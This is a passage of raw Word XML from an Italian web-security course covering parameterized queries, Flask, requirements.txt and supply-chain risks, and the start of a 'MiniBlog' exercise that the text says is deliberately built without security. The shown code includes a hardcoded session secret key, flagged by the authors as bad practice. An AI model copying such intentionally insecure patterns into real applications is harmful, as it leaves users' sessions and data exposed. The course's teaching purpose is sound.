        <w:t xml:space="preserve">: dicono al database</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">qui ci andranno due valori, sono questi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il database stesso si occupa di sostituirli in modo sicuro, garantendo che l’utente non possa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">iniettare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">istruzioni SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Questa tecnica si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">query parametrizzata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">prepared statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) ed è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">la difesa principale contro SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Il </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_5" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> sarà tutto su questo. Per ora, abituati allo stile:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">mai concatenare input nelle query, sempre usare i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="130"/>
    <w:bookmarkEnd w:id="131"/>
    <w:bookmarkStart w:id="133" w:name="X384ca112b489f8baf6afaddc923e8a7b80ba964"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="sec_3_12"/>
      <w:r>
        <w:t xml:space="preserve">3.12 Framework web: cos’è e perché useremo Flask</w:t>
      </w:r>
      <w:bookmarkEnd w:id="479"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per costruire una vera applicazione web non basta saper rispondere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ciao mondo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">come abbiamo fatto nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">. Servono molte cose: gestire i parametri delle URL, leggere e salvare i cookie, parsare il body delle POST, scrivere HTML dinamico, connettersi al database in modo pulito, gestire errori, gestire sessioni utente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Scrivere tutto questo da zero ogni volta sarebbe insopportabile. Per questo esistono i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= un’impalcatura di codice, già pronta, che ti fornisce gratuitamente le parti più ripetitive di un’applicazione (il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">boilerplate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), così che tu possa concentrarti sulla logica specifica del tuo progetto. Non è una libreria che chiami quando serve: è una struttura dentro cui scrivi il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">tuo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">codice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">I framework web Python più diffusi sono:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: minimale. Ti dà l’essenziale, lascia a te tutte le scelte. Adatto per imparare e per progetti piccoli/medi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Django</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: completo,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">batterie incluse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ti dà autenticazione, pannello di amministrazione, ORM, sistema di template, tutto. Adatto per progetti grandi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1054"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">FastAPI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: moderno, focalizzato su API REST e prestazioni elevate. Adatto per backend di applicazioni mobile o single-page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per il corso useremo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, per due ragioni: scrivere un’app funzionante richiede pochissime righe, ed è abbastanza minimale da farti vedere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cosa succede sotto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">senza nascondere troppo dietro comodità. Quando avrai capito Flask, capire Django o FastAPI sarà solo questione di abituarti a una sintassi diversa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="132" w:name="le-quattro-cose-che-fa-un-framework-web"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le quattro cose che fa un framework web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Routing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: associa URL a funzioni Python.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Quando arriva una richiesta a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">, esegui questa funzione.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Gestione di richiesta e risposta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ti dà oggetti convenienti per leggere parametri, body, cookie, header in entrata, e per costruire la risposta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Template HTML</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ti dà un linguaggio per scrivere pagine HTML con dati dinamici (per Flask:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Jinja2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1055"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sessioni e cookie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: gestisce automaticamente la creazione e la lettura dei cookie di sessione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tutto questo lo vedremo all’opera nell’esercitazione fra poco.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="132"/>
    <w:bookmarkEnd w:id="133"/>
    <w:bookmarkStart w:id="134" w:name="le-dipendenze-pip-e-requirements.txt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="480" w:name="sec_3_13"/>
      <w:r>
        <w:t xml:space="preserve">3.13 Le dipendenze: pip e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:bookmarkEnd w:id="480"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un’applicazione moderna non è scritta tutta da zero. Si appoggia a decine — talvolta centinaia — di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">librerie</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sviluppate da altri (Flask stesso è una libreria). Il gestore di queste librerie in Python si chiama</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">pip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, lo conosci dal </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_0" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 0</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando un progetto cresce, è scomodo ricordarsi quali librerie ha installato e in quali versioni. Per questo si usa un file convenzionale chiamato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: un semplice file di testo che elenca, una per riga, le librerie del progetto e le loro versioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempio di un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">minimale:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Flask==3.0.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Werkzeug==3.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Jinja2==3.1.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ognuno che riceve il progetto può ricostruire l’ambiente esatto con un solo comando:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Anticipazione del </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:bCs/>
            <w:b/>
            <w:color w:val="0563C1"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Capitolo 9</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è il punto in cui entrano nel tuo progetto le</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerabilità della supply chain</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Ogni libreria che importi può avere bug di sicurezza noti (CVE) che diventano automaticamente bug del tuo progetto. Strumenti come</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip-audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(lo vedremo) leggono il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e ti dicono quali librerie hanno CVE noti. Per ora limitati a sapere che esiste questo problema.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="134"/>
    <w:bookmarkStart w:id="139" w:name="X09acf66c0f49d2d1d9a45a1678200bbe0559d55"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="481" w:name="sec_3_14"/>
      <w:r>
        <w:t xml:space="preserve">3.14 Esercitazione pratica: costruiamo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MiniBlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="481"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Adesso applichiamo tutto quello che abbiamo visto. Costruiremo un’applicazione web minimale chiamata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MiniBlog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: una pagina dove utenti registrati possono pubblicare brevi messaggi, in stile bacheca. Avrà login, sessione, database.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Niente sicurezza ancora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il punto è che tu veda come si compongono i pezzi.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="135" w:name="setup-del-progetto"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Setup del progetto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri VS Code nella cartella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">corso-sicurezza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea una nuova sottocartella chiamata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">miniblog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri il terminale integrato e attiva l’ambiente virtuale (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">source venv/bin/activate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su Mac/Linux,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.\venv\Scripts\Activate.ps1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">su Windows).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Entra nella cartella:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cd miniblog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica che Flask sia installato:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip list | findstr Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Windows) o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip list | grep Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Mac/Linux). Se non c’è:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pip install flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="135"/>
    <w:bookmarkStart w:id="136" w:name="crea-il-file-principale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea il file principale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Crea un file</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">miniblog.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con questo contenuto:</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redirect, render_template_string, session</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sqlite3</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app.secret_key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"questa-chiave-non-andrebbe-mai-in-chiaro-nel-codice"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Vedremo nel </w:t>
      </w:r>
      <w:hyperlink w:anchor="ch_7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="0563C1"/>
